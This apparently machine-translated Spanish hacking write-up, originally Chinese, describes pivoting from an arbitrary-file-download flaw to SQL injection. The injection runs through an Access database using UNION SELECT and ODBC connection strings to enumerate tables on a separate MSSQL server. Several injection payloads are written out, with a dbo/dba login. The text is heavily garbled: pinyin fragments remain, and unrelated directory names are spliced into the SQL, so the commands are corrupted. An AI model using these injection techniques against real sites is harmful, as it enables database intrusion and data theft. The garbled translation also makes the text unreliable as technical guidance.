Primer punto, este método ha sido hace mucho tiempo, pero probablemente en la cabeza con un tiempo de silencio durante demasiado tiempo, ya en el estado olvidado. Gracias La información de rastreo. A menudo se enfrentan vulnerabilidad arbitraria descarga de archivos, el método general del tratamiento es devolver la conexión de base de archivo a descargar, a continuación, la conexión remota.
A menudo se enfrentan vulnerabilidad arbitraria descarga de archivos, el método general del tratamiento es devolver la conexión de base de archivo a descargar, a continuación, subir a la conexión remota. estado ideal de MSSQL, y MySQL, sobre todo en la base de datos y la Web no es el caso de separación, de copia de seguridad SHELL, la exportación SHELL, se puede utilizar de muchas maneras.
Pero si la base de datos y WEB Fen Li, y el acceso a bases de datos, incluyendo la red Buke, o tienen otras 手段 firewall Deng Deng hizo hemos podido Yuan base de datos de Cheng en punto, podría Jia Ella es otra difícil, o incluso un mssql Shedian Zhu no Zhaodao cuando, en muchos casos generalmente indefensos.
Aquí a MSSQL como ejemplo, se pasó a encontrar una vulnerabilidad de descarga de archivos arbitrarios, directamente bajo el web.config volver a ver, incluyendo base de datos de descubrimiento de la red, para encontrar un medio día no ha encontrado el punto de inyección, una notas marginales poco, ¿hay alguna estación, la ACCESO piedad base de datos. Adivina la tabla y la espalda. Sin embargo, la estación de destino de fondo es conocida, entonces preparado para leer desde el punto de acceso de la cuenta de administrador del punto de impacto de la inyección. Algunos intuitiva, dada directamente por debajo de los resultados de mi prueba local:
Obtener un punto sencillo de tres campos, ID, XM, XB, escriba el número de identificación, seguido de dos caracteres.
Supongamos que hay lagunas en el documento, la aplicación de la instrucción SQL selecciona bin conf copia de seguridad de datos de configuración generate.sh eshow_sitemap.html registro tmp maint svn sitemap.html de whrere prueba id = 1
Hay tres campos, se utiliza la investigación conjunta de la Unión para que coincida con lo que es (operación de recuadro negro con el orden de campos o para determinar el número de fuerza bruta)
generate.sh conf SELECCIONAR bin copia de seguridad de datos de configuración de registro eshow_sitemap.html maint tmp sitemap.html svn de pruebas en que id = 999999 unión Seleccione arriba 1 1,2, el nombre de [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ; Servidor de Base de Datos =*****; =] amo. ku
Aquí la base de datos master que he creado una tabla denominada KU, por encima de esta consulta, ya que id = 999999 no existe bajo la acción de la investigación conjunta, el contenido web en el programa original de la ubicación de la base de datos de acceso muestra de nuestra estructura UNIÓN resultados de la consulta, el nombre del campo en una posición de visualización de caracteres.
ku contenidos de esta tabla el campo del nombre se mostrará en la web en la posición correspondiente, pero esto no es lo que queremos con claridad, queremos que toda la estructura de tabla y el contenido
Para dominar a modo de ejemplo, aquí está el resultados de la simulación, de antemano ya sé la estructura del maestro, conveniente y los resultados serán comparados con la suma de control es incorrecto.
generate.sh conf SELECCIONAR bin copia de seguridad de datos de configuración de registro eshow_sitemap.html maint tmp sitemap.html svn de pruebas en que id = 999999 unión Seleccione arriba 1 1,2, table_name a partir de [ODBC; Driver = SQL Server; UID = dbo; PWD = dba INFORMATION_SCHEMA.TABLES; Servidor de Base de Datos =*****; =] amo.
Esta base de datos master nombre de la tabla por primera vez.
Ponte detrás del nombre de la tabla es simple.
generate.sh conf SELECCIONAR bin copia de seguridad de datos de configuración de registro eshow_sitemap.html maint tmp sitemap.html svn de pruebas en que id = 999999 unión Selecciona arriba 1 1,2, table_name a partir del [ODBC; Driver = SQL Server; UID = dbo; PWD = dba ; Servidor de Base de Datos =*****; =] amo. INFORMATION_SCHEMA.TABLES donde nombre_tabla no en (arriba seleccionar 1 de table_name [ODBC; Driver = SQL Server; UID = dbo; PWD = dba; servidor =****; database = master]. INFORMATION_SCHEMA.TABLES)
clase inferior para empujar la carrera método convencional para obtener los nombres de campo y el contenido de los campos del código bajo su propia engorroso.
Si la base de datos donde el identificador es un personaje, a continuación,
generate.sh conf SELECCIONAR bin copia de seguridad de datos de configuración de registro eshow_sitemap.html maint tmp sitemap.html svn de pruebas en que id = '999999 'UNION SELECT top 1 1,2, table_name a partir de [ODBC; Driver = SQL Server; UID = dbo; personas con discapacidad = dba; Base de datos de servidor =***; =] amo. INFORMATION_SCHEMA.TABLES donde '1 '= '1'